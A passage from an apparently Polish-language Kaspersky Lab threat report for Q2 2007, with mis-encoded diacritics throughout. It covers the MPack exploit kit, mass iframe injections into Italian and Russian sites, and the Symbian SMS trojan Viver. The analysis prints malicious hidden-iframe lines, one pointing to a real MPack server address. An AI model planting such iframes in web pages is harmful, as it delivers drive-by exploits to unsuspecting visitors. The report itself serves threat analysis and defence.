Bior膮c pod uwag臋 powy偶sze, mo偶na wysun膮膰 wniosek, 偶e szkodliwe programy dla iPhone'a mog膮 zacz膮膰 pojawia膰 si臋 w nast臋pnym roku, jednak prawdopodobnie nie b臋d膮 to robaki. Najprawdopodobniej b臋d膮 to typowe wirusy plikowe oraz r贸偶ne trojany. Najwi臋kszym zagro偶eniem dla u偶ytkownik贸w iPhone'a b臋d膮 r贸偶ne luki w zabezpieczeniach, kt贸re mog膮 by膰 wykorzystane przez szkodliwych u偶ytkownik贸w w celu uzyskania dost臋pu do informacji przechowywanych w telefonie.

Mpack

W po艂owie czerwca media z bran偶y bezpiecze艅stwa IT zosta艂y zbombardowane doniesieniami z W艂och. Okaza艂o si臋, 偶e kilka tysi臋cy w艂oskich stron internetowych stanowi 藕r贸d艂o rozprzestrzeniania si臋 szkodliwych program贸w. W ci膮gu kilku dni na ponad sze艣ciu tysi膮cach serwer贸w znaleziono strony zawieraj膮ce kilka linijek kodu HTML, kt贸ry nie zosta艂 dodany przez ich w艂a艣cicieli. Kod wygl膮da艂 mniej wi臋cej tak (istnieje wiele wariant贸w, w kt贸rych rozmiar p艂ywaj膮cej ramki (szeroko艣膰/wysoko艣膰) zosta艂 przedstawiony jako zero, jeden itd.):

< iframe src=address’ width=5 height=5 > < /iframe >

Eksperci z firmy Kaspersky Lab wiedzieli o tych ci膮gach ju偶 od kilku lat. S膮 to typowe konstrukcje stosowane w celu wykorzystania luk w zabezpieczeniach przegl膮darek. Strona internetowa wskazana w polu "adres" pe艂ni funkcj臋 przekierowania do nast臋pnej strony zawieraj膮cej exploit lub sama w sobie jest odpowiedzialna za przeprowadzenie infekcji.

Znacznik

< iframe >
od dawna stanowi jedn膮 z najcz臋艣ciej stosowanych w takich przypadkach technik. Otwiera on nowe okno przegl膮darki, a gdy rozmiar okna jest ustawiony na zero, u偶ytkownik mo偶e go nie zauwa偶y膰. W rezultacie, exploit mo偶e zosta膰 wykorzystany niepostrze偶enie, a u偶ytkownik nie b臋dzie nawet podejrzewa艂, 偶e odwiedza jak膮艣 inn膮 stron臋 opr贸cz tej w oknie g艂贸wnym.

Poni偶ej przedstawiamy kilka przyk艂ad贸w:

We wrze艣niu 2006 roku analitycy z firmy Kaspersky Lab otrzymali raport o dziwnym zachowaniu przegl膮darki internetowej podczas otwierania przez u偶ytkownik贸w stron top.rbc.ru: Internet Explorer, nawet ca艂kowicie za艂atany, za艂amywa艂 si臋, natomiast Firefox dzia艂a艂, poch艂ania艂 jednak oko艂o 400 MB pami臋ci RAM.

Analizuj膮c te strony, eksperci z firmy Kaspersky Lab znale藕li kod w odno艣niku prowadz膮cy do strony zarejestrowanej w domenie pp.se. Przy u偶yciu tego odno艣nika znaleziono skrypt wykorzystuj膮cy luk臋 opisan膮 w biuletynie Microsoft Security Advisory (926043)

Exploit pobiera艂 najnowsz膮 wersj臋 trojana Trojan-PSW.Win32.LdPinch - ayj.

W grudniu 2006 r. eksperci z firmy Kaspersky Lab znale藕li co najmniej 470 serwer贸w zainfekowanych trojanem Trojan-Downloader.JS.Psyme, z kt贸rych wszystkie wykorzystywa艂y us艂ugi firmy hostingowej Valuehost. Jednym z zainfekowanych zasob贸w okaza艂 si臋 popularny serwis www.5757.ru.

Gdy u偶ytkownicy Internetu odwiedzali zainfekowane witryny, skrypt, kt贸ry zosta艂 wbudowany w stron臋 przez szkodliwych u偶ytkownik贸w, zaczyna艂 pobiera膰 trojana Trojan-Downloader.JS.Psyme.ct, kt贸ry pobiera艂 nast臋pnie inne szkodliwe programy na zaatakowany komputer.

Jak wida膰, mamy ju偶 sporo do艣wiadczenia w zwalczaniu tego rodzaju exploit贸w.

Kilka dni przed tym, jak wyst膮pi艂y problemy we W艂oszech, odnotowali艣my podobny incydent w Rosji, r贸wnie偶 tym razem dotyczy艂 on popularnej strony internetowej RBC.ru.

7 czerwca 2007 r. wielu u偶ytkownik贸w, kt贸rzy odwiedzili rbc.ru ujrza艂o ostrze偶enie antywirusowe informuj膮ce o pr贸bie zainfekowania systemu przez trojana. Szczeg贸艂owa analiza wykaza艂a, 偶e strona g艂贸wna zawiera艂a nast臋puj膮cy kod:

 < iframe src="http://81.95.150.42/MPack091cbt/index.php" width=0 height=0 >< /iframe >  

Byli艣my zaskoczeni, 偶e Mpack zdo艂a艂 przedosta膰 si臋 poza granice Rosji i by艂 wykorzystywany we W艂oszech. Oto dlaczego:

  • Mpack zosta艂 stworzony w Rosji. Rosyjscy hakerzy sprzedali go innym rosyjskim hakerom.
  • Jego autorzy to osoby, kt贸re aktywnie uczestniczy艂y w tworzeniu i wspieraniu innego rozpowszechnionego trojana, LdPinch.
  • Na czarnym rynku znajduje si臋 kilka podobnych exploit贸w: Q406 Roll-up package, MDAC, WebAttacker itd. Wszystkie z nich s膮 o wiele "skuteczniejsze" ni偶 Mpack.

Przeanalizujmy, co si臋 dzieje i w jaki spos贸b.

Istnieje kolekcja exploit贸w, kt贸re zosta艂y napisane w PHP (lub innym j臋zyku skryptowym, takim jak VBS czy JS).

Kolekcja ta zawiera kilka exploit贸w, kt贸re wykorzystuj膮 luki w zabezpieczeniach popularnych przegl膮darek oraz system贸w operacyjnych. Najprostsza kolekcja mo偶e zawiera膰 nast臋puj膮ce exploity:

  • MS06-014 dla Internet Explorera 6
  • MS06-006 dla Firefoxa 1.5
  • MS06-006 dla Opery 7
  • WMF Overflow
  • QuickTime Overflow
  • WinZip Overflow
  • VML Overflow

Exploity te s膮 zazwyczaj zaszyfrowane w celu obej艣cia program贸w antywirusowych oraz utrudnienia ich wykrycia i analizy.

Szkodliwi u偶ytkownicy umieszczaj膮 na swoich witrynach gotowy zestaw exploit贸w i pr贸buj膮 nak艂oni膰 u偶ytkownik贸w do ich odwiedzenia. Do tego celu wykorzystywane s膮 inne witryny. Szkodliwy u偶ytkownik uzyska dost臋p do innych witryn, zazwyczaj poprzez wykorzystanie kont dost臋pu skradzionych wcze艣niej przez trojana, takiego jak LdPinch.

Nast臋pnie do wszystkich podstron tych witryn zostanie dodany "z艂o艣liwy" znacznik ramki p艂ywaj膮cej, prowadz膮cy do strony z exploitami. Aby doda膰 znacznik p艂ywaj膮cej ramki do wi臋kszej liczby witryn internetowych, szkodliwy u偶ytkownik mo偶e wykorzysta膰 inne programy, takie jak FTPToolz, kt贸ry zosta艂 stworzony przez innego rosyjskiego ucznia.

Internauci wchodz膮cy na strony, kt贸re zwykle odwiedzaj膮, nie podejrzewaj膮 nawet, 偶e w艂amali si臋 na nie hakerzy, a ich przegl膮darki atakowane s膮 przez wiele r贸偶nych exploit贸w.

Jednak uruchomienie exploit贸w nie jest ostatecznym celem szkodliwych u偶ytkownik贸w, kt贸rzy tak naprawd臋 d膮偶膮 do zainstalowania na zaatakowanych komputerach szkodliwych program贸w. Zwykle wymaga to zainstalowania trojana downloadera. W efekcie szkodliwi u偶ytkownicy mog膮 zainstalowa膰 na zaatakowanych komputerach wirusy, robaki, backdoory, spyware itd.

Wszystkie podobne zestawy exploit贸w posiadaj膮 modu艂y odpowiedzialne za gromadzenie statystyk i szkodliwi u偶ytkownicy maj膮 dost臋p do informacji dotycz膮cych tego, ilu u偶ytkownik贸w zosta艂o zainfekowanych, gdzie s膮 zlokalizowani, jakiej u偶ywaj膮 przegl膮darki, oraz na kt贸re strony "z艂apa艂y si臋" ofiary.

Autorzy Mpacka sprzedawali program za 1 000 dolar贸w, oddzielnie oferuj膮c dalsze wsparcie (dodawanie nowych exploit贸w do kolekcji). Dok艂adnie w ten sam spos贸b sprzedawane s膮 inne popularne, wymienione wcze艣niej kolekcje exploit贸w.

Jednym ze sposob贸w pomiaru skuteczno艣ci kolekcji exploit贸w jest wsp贸艂czynnik infekcji w艣r贸d u偶ytkownik贸w, kt贸rzy odwiedzaj膮 zainfekowan膮 stron臋. Autorzy obiecuj膮 30 - 50% wsp贸艂czynnik skuteczno艣ci, jednak praktyka pokazuje, 偶e nie przekracza on zwykle10 - 12%. Wsp贸艂czynnik ten nadal stanowi pow贸d do niepokoju, zwa偶ywszy na to, 偶e strona jest odwiedzana przez tysi膮ce u偶ytkownik贸w.

Naszym zdaniem najwi臋kszym problem jest to, 偶e poci膮gniecie autor贸w Mpacka do odpowiedzialno艣ci karnej jest bardzo trudne. Z technicznego punktu widzenia, prowadz膮 oni jedynie nielegalny biznes i nie odprowadzaj膮 podatk贸w od dochod贸w ze sprzeda偶y. Nie w艂amuj膮 si臋 na strony internetowe w celu umieszczenia na nich ramek p艂ywaj膮cych - robi膮 to ich klienci. Nie rozprzestrzeniaj膮 trojan贸w - robi膮 to ich klienci. Bior膮 jedynie exploity z otwartych 藕r贸de艂, kt贸re s膮 publikowane na setkach stron internetowych w celu zapewnienia bezpiecze艅stwa IT i zosta艂y znalezione przez innych ludzi. Tworz膮 z tych exploit贸w kolekcje i nie ponosz膮 odpowiedzialno艣ci za to, w jaki spos贸b zostan膮 nast臋pnie wykorzystane.

Przyjrzyjmy si臋 znanemu projektowi bezpiecze艅stwa IT - Metasploit Framework. Autorzy Mpacka robi膮 dok艂adnie to samo co HD Moore (autor projektu Metasploit). Jedyna r贸偶nica polega na tym, 偶e jeden z nich m贸wi uczciwie, do czego mog膮 zosta膰 wykorzystane kolekcje exploit贸w, a drugi twierdzi, 偶e ich produkt jest narz臋dziem administracyjnym niezb臋dnym do testowania bezpiecze艅stwa system贸w komputerowych.

W tym miejscu dochodzimy do ci膮gle aktualnego pytania: czy opublikowanie informacji robi wi臋cej dobrego czy z艂ego? Nie mamy zamiaru wdawa膰 si臋 w dyskusj臋 na ten temat, opowiadaj膮c si臋 po jednej ze stron. Na razie stwierdzamy jedynie fakty, obiecujemy jednak powr贸ci膰 do tej kwestii, przedstawiaj膮c nasz膮 opini臋 odno艣nie obecnej sytuacji "czarne kapelusze" kontra "bia艂e kapelusze".

Viver

W po艂owie maja znale藕li艣my trzy warianty nowego trojana stworzonego dla telefon贸w kom贸rkowych: Trojan-SMS.SymbOS.Viver. Trojan ten wysy艂a wiadomo艣ci tekstowe na p艂atne numery. W rezultacie, ofiara zostaje obci膮偶ona kwot膮 pieni臋dzy, kt贸re s膮 nast臋pnie przelewane na konto szkodliwego u偶ytkownika.

Trojany te nie s膮 niczym nowym: pierwsze podobne szkodniki dzia艂aj膮ce na praktycznie wszystkich telefonach kom贸rkowych obs艂uguj膮cych Jav臋 (tj. RedBrowser, Wesber) wykryli艣my w zesz艂ym roku. Vivera odr贸偶nia od innych takich trojan贸w to, 偶e zosta艂 on napisany specjalnie dla telefon贸w dzia艂aj膮cych na platformie Symbian i jest pierwszym trojanem wykorzystuj膮cym wiadomo艣ci tekstowe, kt贸ry atakuje smartfony.

Analiza pomo偶e nam ustali膰, w jaki spos贸b trojan ten rozprzestrzenia si臋, a szkodliwi u偶ytkownicy dostaj膮 pieni膮dze.

Trojany zosta艂y umieszczone na popularnej rosyjskiej stronie internetowej skierowanej do u偶ytkownik贸w smartfon贸w, dimonvideo.ru, w sekcji wymiany plik贸w. Pliki mog膮 by膰 dodawane przez wszystkich zarejestrowanych u偶ytkownik贸w strony.

Jak zwykle, trojany oferowane by艂y jako przydatne programy narz臋dziowe, takie jak program do obr贸bki zdj臋膰, wideo, codec itd. Po tym, jak zostanie zainstalowany w smartfonie, trojan wysy艂a wiadomo艣膰 tekstow膮 na numer 1055. Koszt wiadomo艣ci wynosi 177 rubli (oko艂o 7 dolar贸w ameryka艅skich).

Numer 1055 jest bardzo interesuj膮cy. Ju偶 wcze艣niej zosta艂 wykorzystany przez rosyjskich oszust贸w dokonuj膮cych kradzie偶y za po艣rednictwem telefon贸w kom贸rkowych. Osoby te wci膮偶 nie zosta艂y ukarane...

W jaki spos贸b to dzia艂a?

Wiadomo, 偶e operatorzy telefonii kom贸rkowej wydzier偶awiaj膮 kr贸tkie numery - jednak koszty s膮 zbyt wysokie dla osoby prywatnej. Istniej膮 dostawcy tre艣ci, kt贸rzy wydzier偶awiaj膮 takie kr贸tkie numery i poddzier偶awiaj膮 je z okre艣lonym prefiksem.

Kr贸tki numer 1055 jest dzier偶awiony przez jednego takiego dostawc臋 tre艣ci z Rosji. Je艣li numer zostanie poddzier偶awiony i wys艂ana na niego wiadomo艣膰 tekstowa b臋dzie zaczyna艂a si臋 na przyk艂ad od S1, dostawca systemu zabierze cz臋艣膰 op艂aty za wiadomo艣膰, a reszt臋 przeleje na konto osoby poddzier偶awiaj膮cej ten numer, w tym przypadku S1. Operator telefonii kom贸rkowej zgarnia 45 - 49% kosztu wiadomo艣ci, dostawca 10%. Reszta przypada osobie poddzier偶awiaj膮cej numer, kt贸r膮 w tym przypadku jest oszust.

Wykazano, 偶e jeden z wariant贸w Vivera zdo艂a艂 zainfekowa膰 blisko 200 os贸b w ci膮gu zaledwie 24 godzin. Po tym czasie administrator strony usun膮艂 z niej informacje niezb臋dne do uzyskania dost臋pu do trojana. Z prostego rachunku wynika, 偶e przy 200 ofiarach i pocz膮tkowym koszcie wiadomo艣ci wynosz膮cym 177 rubli, szkodliwy u偶ytkownik m贸g艂 "zarobi膰" do 14 000 rubli (ponad 500 ameryka艅skich dolar贸w) w ci膮gu jednego dnia.

Incydent ten po raz kolejny pokazuje, 偶e wsp贸艂czesne technologie telefonii kom贸rkowej nadal przyci膮gaj膮 uwag臋 cyberprzest臋pc贸w. W tym przypadku plan opiera艂 si臋 na wykorzystaniu "kr贸tkich numer贸w" oferowanych przez wielu dostawc贸w telefonii kom贸rkowej oraz dostawc贸w tre艣ci. Niestety, mo偶liwo艣膰 "zabrania" pieni臋dzy z konta abonenta telefonii kom贸rkowej bez jego wiedzy oraz bez uzyskania dodatkowego potwierdzenia stanowi s艂aby punkt wsp贸艂czesnych us艂ug telefonii kom贸rkowej, kt贸ry psuje reputacj臋 dostawc贸w telefonii kom贸rkowej oraz dostawc贸w tre艣ci.

W maju odnotowali艣my trzy takie incydenty. Mo偶na si臋 tylko domy艣la膰, jak wiele nie zosta艂o wykrytych. Niestety, nie dysponujemy danymi statystycznymi dla wi臋kszo艣ci innych pa艅stw, a zagraniczne firmy antywirusowe nie donosi艂y o podobnych incydentach. Trudno uwierzy膰 w to, 偶e jest to wy艂膮cznie rosyjski problem.

Podsumowanie

Kluczowe wydarzenia om贸wione w tym raporcie, kt贸re mia艂y miejsce w drugim kwartale 2007 r., z pewno艣ci膮 sk艂aniaj膮 do przemy艣le艅, wci膮偶 jednak nie daj膮 odpowiedzi na nasze pytanie: jaki b臋dzie nast臋py krok w rozwoju wirus贸w i zagro偶e艅 informatycznych? Mimo pojawienia si臋 nowych system贸w operacyjnych (takich jak Windows Vista), nowych us艂ug (tre艣ci dostarczane za po艣rednictwem telefon贸w kom贸rkowych) oraz urz膮dze艅 (iPhone), cybernetyczny 艣wiatek przest臋pczy nadal cierpi na brak inicjatywy i wykorzystuje wypr贸bowane sposoby w celu wyrz膮dzania szk贸d u偶ytkownikom Internetu. Innowacje ograniczaj膮 si臋 do niewielkiej liczby zagro偶e艅 "proof-of-concept", kt贸rych nikt dalej nie rozwija.

Ponadto, obserwujemy powr贸t do "藕r贸de艂": coraz cz臋艣ciej komputery padaj膮 ofiar膮 atak贸w DDoS oraz atak贸w wykorzystuj膮cych luki w zabezpieczeniach przegl膮darek w celu przenikni臋cia do systemu. Jedyn膮 r贸偶nic臋, jak膮 obserwujemy w stosunku do okresu sprzed trzech lat, jest prawdopodobnie fakt, 偶e poczta elektroniczna nie jest ju偶 wykorzystywana jako g艂贸wny spos贸b rozprzestrzeniania wirus贸w. Obecnie, jednym z kluczowych narz臋dzi dystrybucji szkodliwego oprogramowania s膮 komunikatory internetowe. Kolejna r贸偶nica polega na tym, 偶e nast膮pi艂 gwa艂towny wzrost liczby trojan贸w atakuj膮cych u偶ytkownik贸w gier online.

Zagro偶enia nie staj膮 si臋 "inteligentniejsze". Nast膮pi艂a stagnacja, poniewa偶 tw贸rcy szkodliwego oprogramowania koncentruj膮 si臋 na poprawkach kosmetycznych. Nadal nie wiemy, co mo偶e pos艂u偶y膰 jako katalizator zmiany charakteru wirus贸w na scenie globalnej, jak wcze艣niej opublikowanie systemu Windows 95, wy艂onienie si臋 robak贸w LoveLetter oraz Mellisa, pierwszego makrowirusa oraz epidemii robak贸w Lovesan i Mydoom.

Firmy antywirusowe znacznie ulepszy艂y swoje technologie i wprowadzi艂y szereg nowych, nie przestaj膮c rozwija膰 ca艂kowicie nowych metod.

Ka偶da nowa wersja dowolnego produktu antywirusowego to co艣 wi臋cej ni偶 inny interfejs - oznacza ona kilka nowych funkcji, kt贸re znacznie ulepszaj膮 ochron臋 u偶ytkownika. Obecnie klienci firm antywirusowych otrzymuj膮 o wiele efektywniejsz膮 ochron臋 ni偶 dwa lata temu. 艢redni czas przebywania wi臋kszo艣ci nowych szkodliwych program贸w "na wolno艣ci" zosta艂 skr贸cony do kilku godzin, rzadko kiedy wynosi kilka dni.

Spr贸bujmy przewidzie膰, co zdarzy si臋 w najbli偶szej przysz艂o艣ci.

Szkodliwi u偶ytkownicy b臋d臋 pr贸bowali si臋gn膮膰 poza "obszar ochrony" zapewniany przez rozwi膮zania antywirusowe - wymaga to wi臋kszej aktywno艣ci w dziedzinach, kt贸re nie zosta艂y jeszcze opanowane przez ochron臋 antywirusow膮 dobrej jako艣ci lub dziedzinach, w kt贸rych z wielu powod贸w ochrona nie stanowi opcji. Jest to wi臋cej ni偶 pewne tam, gdzie utworzy si臋 nowy front w wojnie informatycznej: gry online, blogi, komunikatory internetowe oraz sieci wymiany plik贸w.

殴r贸d艂o:
Kaspersky Lab